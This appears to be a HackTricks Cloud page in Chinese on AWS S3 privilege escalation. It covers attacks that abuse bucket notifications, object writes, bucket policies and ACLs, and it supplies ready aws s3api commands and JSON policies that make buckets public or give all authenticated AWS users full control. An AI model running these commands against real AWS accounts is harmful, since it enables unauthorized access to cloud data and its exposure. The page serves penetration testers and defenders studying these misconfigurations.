Chinese - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

AWS - S3 Privesc

从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)

支持HackTricks的其他方式:

S3

s3:PutBucketNotification, s3:PutObject, s3:GetObject

拥有这些权限的攻击者可能能够劫持资源并提升权限。

例如,拥有这些对名为"cf-templates-nohnwfax6a6i-us-east-1"的cloudformation存储桶的权限的攻击者将能够劫持部署。可以使用以下策略授予访问权限:

{
"Version":"2012-10-17",
"Statement":[
{
"Effect":"Allow",
"Action":[
"s3:PutBucketNotification",
"s3:GetBucketNotification",
"s3:PutObject",
"s3:GetObject"],
"Resource":[
"arn:aws:s3:::cf-templates-*\/*",
"arn:aws:s3:::cf-templates-*"]
},
{
"Effect":"Allow",
"Action":"s3:ListAllMyBuckets",
"Resource":"*"
}]
}

并且劫持是可能的,因为从上传模板到部署模板之间存在很短的时间窗口。攻击者可能会在他的帐户中创建一个Lambda函数,当发送存储桶通知时会触发,并劫持存储桶内容

Pacu模块cfn__resouce_injection可用于自动化此攻击。 有关更多信息,请查看原始研究:https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/

s3:PutObject, s3:GetObject

这些是获取和上传S3对象的权限。AWS内部(以及外部)的多个服务使用S3存储来存储配置文件。 具有对其的读取访问权限的攻击者可能会在其中找到敏感信息。 具有对其的写入访问权限的攻击者可以修改数据以滥用某些服务并尝试提升权限。 以下是一些示例:

  • 如果EC2实例将用户数据存储在S3存储桶中,攻击者可以修改它以在EC2实例内执行任意代码

s3:PutBucketPolicy

攻击者,需要来自相同帐户,如果不是,则会触发错误指定的方法不允许,具有此权限将能够授予自己更多对存储桶的权限,允许他读取、写入、修改、删除和公开存储桶。

# Update Bucket policy
aws s3api put-bucket-policy --policy file:///root/policy.json --bucket <bucket-name>

## JSON giving permissions to a user and mantaining some previous root access
{
"Id": "Policy1568185116930",
"Version":"2012-10-17",
"Statement":[
{
"Effect":"Allow",
"Principal":{
"AWS":"arn:aws:iam::123123123123:root"
},
"Action":"s3:ListBucket",
"Resource":"arn:aws:s3:::somebucketname"
},
{
"Effect":"Allow",
"Principal":{
"AWS":"arn:aws:iam::123123123123:user/username"
},
"Action":"s3:*",
"Resource":"arn:aws:s3:::somebucketname/*"
}
]
}

## JSON Public policy example
### IF THE S3 BUCKET IS PROTECTED FROM BEING PUBLICLY EXPOSED, THIS WILL THROW AN ACCESS DENIED EVEN IF YOU HAVE ENOUGH PERMISSIONS
{
"Id": "Policy1568185116930",
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Stmt1568184932403",
"Action": [
"s3:ListBucket"
],
"Effect": "Allow",
"Resource": "arn:aws:s3:::welcome",
"Principal": "*"
},
{
"Sid": "Stmt1568185007451",
"Action": [
"s3:GetObject"
],
"Effect": "Allow",
"Resource": "arn:aws:s3:::welcome/*",
"Principal": "*"
}
]
}

s3:GetBucketAcl, s3:PutBucketAcl

攻击者可以滥用这些权限来授予自己对特定存储桶的更多访问权限。 请注意,攻击者不需要来自相同的账户。此外,还有写入权限。

# Update bucket ACL
aws s3api get-bucket-acl --bucket <bucket-name>
aws s3api put-bucket-acl --bucket <bucket-name> --access-control-policy file://acl.json

##JSON ACL example
## Make sure to modify the Owner’s displayName and ID according to the Object ACL you retrieved.
{
"Owner": {
"DisplayName": "<DisplayName>",
"ID": "<ID>"
},
"Grants": [
{
"Grantee": {
"Type": "Group",
"URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
},
"Permission": "FULL_CONTROL"
}
]
}
## An ACL should give you the permission WRITE_ACP to be able to put a new ACL

s3:GetObjectAcl, s3:PutObjectAcl

攻击者可以滥用这些权限来授予自己对存储桶内特定对象的更多访问权限。

# Update bucket object ACL
aws s3api get-object-acl --bucket <bucekt-name> --key flag
aws s3api put-object-acl --bucket <bucket-name> --key flag --access-control-policy file://objacl.json

##JSON ACL example
## Make sure to modify the Owner’s displayName and ID according to the Object ACL you retrieved.
{
"Owner": {
"DisplayName": "<DisplayName>",
"ID": "<ID>"
},
"Grants": [
{
"Grantee": {
"Type": "Group",
"URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
},
"Permission": "FULL_CONTROL"
}
]
}
## An ACL should give you the permission WRITE_ACP to be able to put a new ACL

s3:GetObjectAcl, s3:PutObjectVersionAcl

具有这些权限的攻击者预计能够将 Acl 放置到特定对象版本。

aws s3api get-object-acl --bucket <bucekt-name> --key flag
aws s3api put-object-acl --bucket <bucket-name> --key flag --version-id <value> --access-control-policy file://objacl.json
从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)

其他支持HackTricks的方式:

PreviousAWS - Organizations PrivescNextAWS - Sagemaker Privesc

Last updated